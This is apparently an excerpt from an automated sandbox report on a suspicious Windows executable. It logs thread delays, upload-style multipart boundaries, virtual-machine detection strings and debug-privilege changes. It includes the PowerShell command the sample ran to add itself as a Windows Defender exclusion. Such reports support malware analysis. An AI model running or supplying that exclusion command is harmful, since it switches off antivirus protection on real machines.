Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597678	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596197	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 596060	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595932	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595322	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593857	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593750	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593641	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593527	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593422	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593188	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 593032	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592922	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592812	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592701	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592594	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592451	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 592033	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 591860	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Thread delayed: delay time: 591735	Jump to behavior

Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dceda29d3c6d36x
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf9d8c62b6eaa
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfd8dd3173e73<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce145cf287277
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcec1905bf2532
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dceb74ccc25642
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfc85c0ec18c4<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf58390560c28
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce877a27dbee6
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce28d374b643b
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce48b25642664
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf4e11bdf27c5
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf0da5cd67621
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce6595a48f150
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcea958ea7bf62
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf532054265df<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfbbd134a20ab<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce5c42c66f75a
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce1919006e200
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dceca6b78bb960
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcef804a628f99
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf0da5cd67621<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce13183a9347e
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce1a8328f39e5
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dceef1595bfa24
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce7fb87142c6b
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce15f1cd8d4a6
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce0f97f541458
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dced03a557fb41
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf1c5e0a55f4d
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf153b5b03cf7<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf6c18fae546b
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf446742a4c93
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcee495f473e47<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf07553701b70
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce10b5aae0611
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf6876dc1317c<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce6a815037598
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf2133ac4fdc1
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd000d068243f5<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfa418297b08d
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf6876dc1317c
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfa418297b08d<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf02757f53aeb
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfaa80f9e2e7c<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf532054265df
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfb05d9164ed6
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf7142122a2e8
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce828840f367e
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf1c5e0a55f4d<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf2133ac4fdc1<
Source: .05.2024.exe, 00000004.00000002.1305520033.0000000000821000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\XD
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfbbd134a20ab
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd26e1095c47bd<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd006e6712ef2c<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfb639c1a34e0
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce6fc2b798d31
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dceb010d6fdd7f
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcffa729a7b8c8<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf5eba8e78de7<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf9d8c62b6eaa<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce74d56b39fdd
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce0dc1483271d
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcea74137d8a4a
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dceef1595bfa24<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf07553701b70<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf446742a4c93<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfaa80f9e2e7c
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfd3a5a04b9e9<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcefd3cec495f5
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcedf825b5defe
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcee9ede9ecfcb<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce4b7ad6831a6
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf02757f53aeb<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfc21661836e7<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf7142122a2e8<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf5b1dc6a6862<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd01d1473ef670<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfc21661836e7
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfc85c0ec18c4
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcef804a628f99<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002B5F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd2f060fba2423x
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce60ec1e5a41d
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf5eba8e78de7
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf153b5b03cf7
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd098f10ba3de7<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dced56b36c4986
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce17718e41189
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce462b857c4c3
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf6c18fae546b<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfb05d9164ed6<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce4f09da9c850
Source: .05.2024.exe, 0000000A.00000002.3747143236.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf4e11bdf27c5<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfb639c1a34e0<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce7ce6df8c10a
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf5b1dc6a6862
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfce6f192956e
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcebc8594d8039
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002D08000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcf58390560c28<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002864000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dce576e1518677
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcee9ede9ecfcb
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcfce6f192956e<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcefd3cec495f5<
Source: .05.2024.exe, 0000000A.00000002.3748481710.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dcee495f473e47

Source: C:\Users\user\Desktop\.05.2024.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe

Code function: 10_2_064DCE20 LdrInitializeThunk,

10_2_064DCE20

Source: C:\Users\user\Desktop\.05.2024.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe"
Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe"			Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe"			Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process created: C:\Users\user\Desktop\.05.2024.exe "C:\Users\user\Desktop\.05.2024.exe"			Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Users\user\Desktop\.05.2024.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
